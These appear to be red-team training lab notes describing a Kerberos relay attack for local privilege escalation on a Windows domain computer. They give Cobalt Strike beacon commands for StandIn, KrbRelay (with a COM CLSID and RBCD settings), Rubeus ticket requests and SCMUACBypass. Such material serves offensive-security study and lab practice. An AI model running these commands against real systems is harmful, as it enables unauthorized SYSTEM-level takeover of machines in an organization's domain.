Attack Overview

Goal: Local privilege escalation on TargetComputer

  • Start RPC listener
  • Coerce COM server to authenticate over Kerberos obtain service ticket for HOST/TargetComputer
  • Relay ticket to LDAP/TargetComputer, then use relevant techniques (RBCD, shadow credentials attack) to modify computer account object and achieve local privilege escalation.

SMB signing

This attack does not work if SMB signing is required (this is enabled but not required by default except for DC, but it became required in Windows Insider builds, e.g., Windows 11 & Server).

Tools

  • C2: Cobalt Strike
  • Relaying: KrbRelay, KrbRelayUp (can automate everything; not covered here)
  • LPE: StandIn, Whisker, Rubeus

Add set tasks_max_size "2097152"; to the top of Malleable C2 profile (KrbRelay is too big).

Use StandIn to create computer account

beacon> execute-assembly C:\Tools\StandIn\StandIn\StandIn\bin\Release\StandIn.exe --computer EvilComputer --make
# record SID and save in $computer_sid
beacon> powershell Get-DomainComputer -Identity EvilComputer -Properties objectsid

Run KrbRelay against the target SPN:

# Note down allowed port for OXID resolver
beacon> execute-assembly C:\Tools\KrbRelay\CheckPort\bin\Release\CheckPort.exe
# Run KrbRelay & RBCD
# note: clsid => RPC_C_IMP_LEVEL_IMPERSONATE
beacon> execute-assembly C:\Tools\KrbRelay\KrbRelay\bin\Release\KrbRelay.exe -spn $ldap_spn -clsid 90f18417-f0f1-484e-9d3c-59dceee5dbd8 -rbcd $computer_sid -port $allowed_port

The above command will make changes through LDAP to allow the dummy computer (EvilComputer) to RBCD to LDAP. Get a ticket for HOST/TargetComputer through RBCD (e.g. Rubeus.exe asktgt then Rubeus.exe s4u).

Use SCMUACBypass to achieve local privilege escalation with this ticket. For RTO lab purposes, this is available through the elevante svc-exe-krb [listener-name] command (found in C:\Tools\SCMUACBypass).